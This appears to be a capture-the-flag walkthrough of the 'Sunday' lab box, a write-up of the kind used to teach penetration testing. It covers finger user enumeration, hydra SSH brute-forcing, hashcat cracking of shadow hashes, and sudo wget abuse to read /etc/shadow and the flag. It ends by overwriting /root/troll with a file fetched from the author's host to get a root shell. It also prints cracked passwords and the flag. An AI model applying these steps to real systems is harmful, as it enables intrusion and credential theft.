Sunday

Last updated 5 months ago

Was this helpful?

Sunday

Enumeration

When i connect to a machine i usally use nmap to scan but for just learning new tools i will use rustscan to scan all ports then use nmap to scan the version and use scripts

$ rustscan 10.10.10.76 --no-nmap
Open 10.10.10.76:79
Open 10.10.10.76:111
Open 10.10.10.76:515
Open 10.10.10.76:6787
Open 10.10.10.76:22022
10.10.10.76 -> [79,111,515,6787,22022]

$ nmap -sC -sV -p 79,111,515,6787,22022 -oA portscan.txt 10.10.10.76
PORT      STATE SERVICE VERSION
79/tcp    open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: 400 Bad Request
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.94SVN%I=7%D=10/14%Time=670D1AC0%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,12,"No\x20one\x20logged\x20on\r\n")%r(GetRequest,93,"Login
...snip..
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\?\?\?\r\n");

Finger 79/tcp

Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine. The protocol itself was designed in the 1970s, and is run in cleartext. (ref) (ref2) So now we need to gather information about users on the machine, to do this we can use metasploit (auxiliary/scanner/finger/finger_users) but i will use finger-user-enum by pentestmonkey

$ wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ tar -xzf finger-user-enum-1.0.tar.gz && cd finger-user-enum-1.0
# we need list of users to brute force
# i will use this https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
$ ./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76

access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..netadm   Network Admin                      < .  .  .  . >..netcfg   Network Configuratio               < .  .  .  . >..dhcpserv DHCP Configuration A               < .  .  .  . >..ikeuser  IKE Admin                          < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
ike@10.10.10.76: ikeuser  IKE Admin                          < .  .  .  . >..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..ann                   ???..jo                    ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin                 < .  .  .  . >..
message@10.10.10.76: Login       Name               TTY         Idle    When    Where..smmsp    SendMail Message Sub               < .  .  .  . >..
miof mela@10.10.10.76: Login       Name               TTY         Idle    When    Where..mela                  ???..miof                  ???..
root@10.10.10.76: root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46         ..
sammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sunny@10.10.10.76: sunny           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sys@10.10.10.76: sys             ???                         < .  .  .  . >..
zsa zsa@10.10.10.76: Login       Name               TTY         Idle    When    Where..zsa                   ???..zsa                   ???..

SSH 22022/tcp

we get 3 users logged in with ssh : root,sammy and sunny so now we will try to brute force ssh we couldn't brute force root and sammy but we got sunny:sunday

$ hydra -s 22022 -t 64 -l sunny -P /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-14 10:24:32
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1575 login tries (l:1/p:1575), ~25 tries per task
[DATA] attacking ssh://10.10.10.76:22022/
[STATUS] 434.00 tries/min, 434 tries in 00:01h, 1168 to do in 00:03h, 37 active
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found

now we logged in as sunny and we don't see user.txt as the user flag that means there are other users we need to search for

# ssh sunny@sunday.htb -p 22022
$ cat /etc/passwd | grep bash
root:x:0:0:Super-User:/root:/usr/bin/bash
openldap:x:75:75:OpenLDAP User:/:/usr/bin/pfbash
sammy:x:100:10::/home/sammy:/usr/bin/bash
sunny:x:101:10::/home/sunny:/usr/bin/bash
# so we need to get sammy's password

Let's keep searching the machine for any odd files we get .bash_history and there are commands run

su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
# lets see what sudo -l gives sunny
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll
    
$ sudo /root/troll
testing
uid=0(root) gid=0(root)
# we see it is printing testing and then id as root
# we can't edit it or even see what is this even after research what is this
# so we will keep continue to look at backup
/backup$ ls -la
-rw-r--r--   1 root     root         319 Dec 19  2021 agent22.backup
-rw-r--r--   1 root     root         319 Dec 19  2021 shadow.backup

#agent22.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

#shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

# they are identical

now we know it is SHA-256 , we will use hashcat to get the mode of hashcat we look at their website , but when we search for SHA-256 we don't get a hash like what we have so we search with $5$ we get " sha256crypt $5$, SHA256 (Unix) 2 " and mode 7400 For a faster result use it on your baremetal os , since i have windows i used on windows and it didn't take a second to crack [ Hashcat | rockyou.txt ]

hashcat hash.txt -m 7400 rockyou.txt
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

Now we know sammy's password is cooldude!

# we login ssh sammy@sunday.htb -p 22022
$id 
uid=100(sammy) gid=10(staff)

$ wc user.txt 
1 1 33 user.txt

For privilege escalation we can see many ways to it and i will try to write about all

#1 Sudo all

$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
# if we can run all that means we can get root bash
$ sudo /bin/bash
root@sunday:/home/sammy# wc /root/root.txt 
1 1 33 /root/root.txt

#2 wget

when we see binaries that we can run as root we look at GTFOBins and see what can we do with it

# For fast win we can read /root/root.txt (flag)
$ sudo wget -i /root/root.txt
--2024-10-14 15:51:22--  http://456efbda87744c9fe91f7358645a8c08/
# and the flag between / /
# we can read /etc/shadow file then crack root password
$ sudo wget -i /etc/shadow
--2024-10-14 15:41:18--  ftp://root/$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553
           => ‘Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553’
# $5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3 is the hash of root
########
# we can download files with wget 
# so what if we can do that to /root/troll to edit it and get a shell to sunny
# and i think that was the goal for the box
# make a file named "troll" then python file transfer server 
# python3 -m http.server 8000
# we need to setup our terminals like this and do sammy's command then fast sunday
sammy$ sudo wget -i http://10.10.16.8:8000/troll -O /root/troll
sunny$ sudo /root/troll
# and we would get a root shell on sunny's terminal

we can read 4 files root.txt : flag troll : the file that sunny can run as root troll.original : a backup file of troll overwrite : a script that runs every 5 seconds and changes troll file back to troll.original